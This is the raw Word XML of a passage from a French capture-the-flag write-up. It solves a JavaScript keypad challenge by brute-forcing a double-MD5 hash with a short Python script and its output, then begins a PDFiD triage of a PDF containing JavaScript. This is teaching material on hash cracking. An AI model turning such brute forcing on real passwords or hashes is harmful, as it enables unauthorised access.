          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc1819424229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 50 - DIGICODE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-41910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>267335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="923925" cy="1080135"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10" name="Picture 10" descr="digicode_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igicode_screen"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="923925" cy="1080135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Un challenge simple fonctionnant avec du javascript. Le but est de trouver le code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Après avoir analysé le code (cf figure X), on voit qu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’il suffit simple de réaliser un brute force sur 6 caractères avec 12 possibilités pour chaque caractère.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pP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var</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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var</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>goodCode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"2f17754f50920de30b06d28de6893fcc"</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 xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:t>function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>add(</w:t>
            </w:r>
            <w:r>
              <w:t>c</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code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>c</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innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>code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C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</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check();</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function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>check()</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C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>goodCode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>))</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style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>color</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"green"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innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"ESE{"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+</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style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>color</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"red"</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t>setTimeout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>clear</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1000</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rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
        </w:rPr>
        <w:t>Figure X - Code source du digicode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Une solution facilement réalisable en python est d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’effectuer un bruteforce local en générant toutes les possibilité de “double” md5 sur 6 caractères provenant du charset (ABC123456789)</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import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>itertools</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>hashlib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>md5</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ite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"123456789ABC"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>goodCode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"2f17754f50920de30b06d28de6893fcc"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ele</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>itertools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.product(</w:t>
            </w:r>
            <w:r>
              <w:t>ite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>repeat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</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ele</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>ele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if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>ele</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r>
              <w:t>hexdigest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>()).</w:t>
            </w:r>
            <w:r>
              <w:t>hexdigest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>goodCode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print</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ele</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Code source de sol.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cette solution ne prend pas plus de 2 secondes pour trouver la bonne combinaison.</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jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">$ time python sol.py </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>48A5C4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>real</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0m1.885s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0m1.663s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>sys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0m0.012s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sortie de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time python sol.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On peut ensuite l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’utiliser sur le digicode pour obtenir le flag comme sur la figure ci-dessous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3276600" cy="21717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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3276600" cy="2171700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Certains participants ont aussi utilisé des outils en ligne pour trouver une correspondance au hash, le site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>“hashkiller.com” faisait très bien la tâche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2f17754f50920de30b06d28de6893fcc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">md5(md5($pass)) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>48A5C4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc977839926"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 100 - PDF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’énoncé du challenge nous indique que le fichier PDF pourrait appartenir à des terroristes et que son contenu est important. On commence donc par l’analyser avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PDFiD</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swissky@crashlab:~/Bureau/make-pdf_V0_1_6$ python pdfid.py Challenge.pdf </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>PDFiD 0.2.1 Challenge.pdf</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PDF Header: %PDF-1.1</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obj                    7</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endobj                 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/JavaScript            1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
